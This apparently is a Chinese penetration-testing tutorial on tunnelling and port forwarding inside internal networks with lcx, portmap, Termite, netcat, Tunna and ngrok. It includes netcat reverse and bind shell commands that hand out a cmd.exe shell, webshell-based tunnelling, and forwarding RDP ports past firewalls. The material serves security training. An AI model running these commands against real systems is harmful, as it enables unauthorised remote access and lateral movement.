内网中的端口转发

本文涉及的产品
云防火墙,500元 1000GB
简介: 参考文献:http://payloads.online/archivers/2018-02-02/1http://www.freebuf.com/articles/web/170970.html工具下载:https://github.com/Brucetg/Pentest-tools使用端口转发技术来访问内网其他主机中,或者将内网中某个端口转发到本地。

参考文献:http://payloads.online/archivers/2018-02-02/1
http://www.freebuf.com/articles/web/170970.html
工具下载:https://github.com/Brucetg/Pentest-tools

使用端口转发技术来访问内网其他主机中,或者将内网中某个端口转发到本地。
端口映射 :
端口映射是将一台主机的内网(LAN)IP地址映射成一个公网(WAN)IP地址,当用户访问提供映射端口主机的某个端口时,服务器将请求转移到本地局域网内部提供这种特定服务的主机。

1.lcx

 -listen <监听端口> <转发端口> 
 -tran<监听端口> <目标地址> <目标端口>
 -slave <目标主机> <目标端口> <本地主机><本机端口>

端口映射 (无法访问内网)

A(192.168.x.xx)无法访问B( 172.21.xx.xx)主机上的端口,但B可以访问外网

实现内网端口转发

//在A主机上监听两个端口,并将来自 8989端口的请求传送给9898端口
A主机上执行命令:lcx.exe -listen 8989 9898
//将B主机的3389端口转发到A主机的8989端口
B主机上执行命令:lcx.exe -slave 192.168.x.xx 8989 172.21.xx.xx 3389

linux使用方式

./portmap -m 2 -p1 8989 -p2 9898
./portmap -m 3 -h1 内网主机IP -p1 3389 -h2 公网主机ip -p2 8989

A与B建立一个通道,将9898的数据不断的传送到B上的目标端口,中间也包括B主机目标端口响应的数据

端口转发 (能够访问内网某台主机)

①A能访问B主机的任何端口,但是无法访问C主机上的端口

实现端口转发

//B主机上监听的端口就相当于访问了C主机上的端口
在B主机上执行:lcx.exe -tran {监听端口} {C主机IP地址} {C主机端口}

②由于防火墙限制,部分端口无法通过防火墙
实现本地端口转发
//将该B主机的无法通过防火墙的3389端口透传到防火墙允许的其他端口53

B主机上执行:lcx -tran 53 B主机ip 3389

2. Termite

这个以前总结过,就不再细说了,直接看此文章就行了https://www.jianshu.com/p/cdaf50bfe6e1

3.nc反弹

①反向连接:

//在公网主机上进行监听:
nc -lvp 9999
//在内网主机上执行:(-t 参数是指通过telnet模式执行cmd.exe)
nc.exe -t -e cmd.exe 192.168.8.140 9999

成功后得到一个内网主机的cmd shell

②正向连接

//远程主机上执行:
nc -l -p 4444 -t -e cmd.exe
//本地主机上执行:
nc -vv 远程主机ip 4444

成功后得到了一个远程主机的一个cmd shell。

4.tunna

Tunna通过HTTP协议建立一个TCP通信隧道,属于端口复用技术。它可以用来绕过防火墙环境中的网络限制。

--help, -h 显示此帮助信息并退出
--url=URL, -u URL 为远程webshel​​l的URL
--lport=LOCAL_PORT, -l LOCAL_PORT代表本地侦听端口
--verbose, -v 详细(输出数据包大小)
--buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP请求大小(一些网站对大小有限制)
--no-socks, -n 不使用 Socks 代理
--rport=REMOTE_PORT, -r    REMOTE_PORT远程服务端口,供webshel​​l连接
--addr=REMOTE_IP, -a REMOTE_IP 远程webshel​​l连接到的地址(默认为 127.0.0.1)
--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging线程间隔(默认值为0.5)
--start-ping, -s 首先启动ping线程 - 一些服务首先发送数据(例如,SSH)
--cookie, -C 请求cookies
--authentication, -t 基本认证

A已经拥有了B主机的Webshell,但是无法对B主机的其他端口进行通信

//将目标服务器的3389端口转发到本地的1234端口
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -v -n -s

//将10.10.12.1服务器的3389端口转发到本地的1234端口
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -a 10.10.12.1 -v -n -s

5.ngrok

访问内网上的内容

//在本机上执行
python2 -m SimpleHTTPServer 80
//在内网主机上执行
'/home/cws6/Desktop/ngrok' http 80

在本机浏览器中访问Forwarding后的网址,就能访问内网主机上的文件。

目录
相关文章
|
7月前
|
弹性计算
在您使用内网ALB,端口6443时遇到健康检查失败的问题
【1月更文挑战第7天】【1月更文挑战第31篇】在您使用内网ALB,端口6443时遇到健康检查失败的问题
105 1
|
安全 网络协议 NoSQL
对内网服务端口进行扫描
对内网服务端口进行扫描,根据开放的端口服务选择横向的方法。
339 1
|
Java 应用服务中间件 Linux
Java实现的公网映射内网端口的开源工具
Holer是由Java实现的是一个将局域网中的应用映射到公网访问的端口映射开源软件,支持转发基于TCP协议的报文。
2921 0
|
数据安全/隐私保护 Windows 安全
|
网络安全 数据安全/隐私保护
|
网络协议 Shell 网络安全
|
Web App开发 应用服务中间件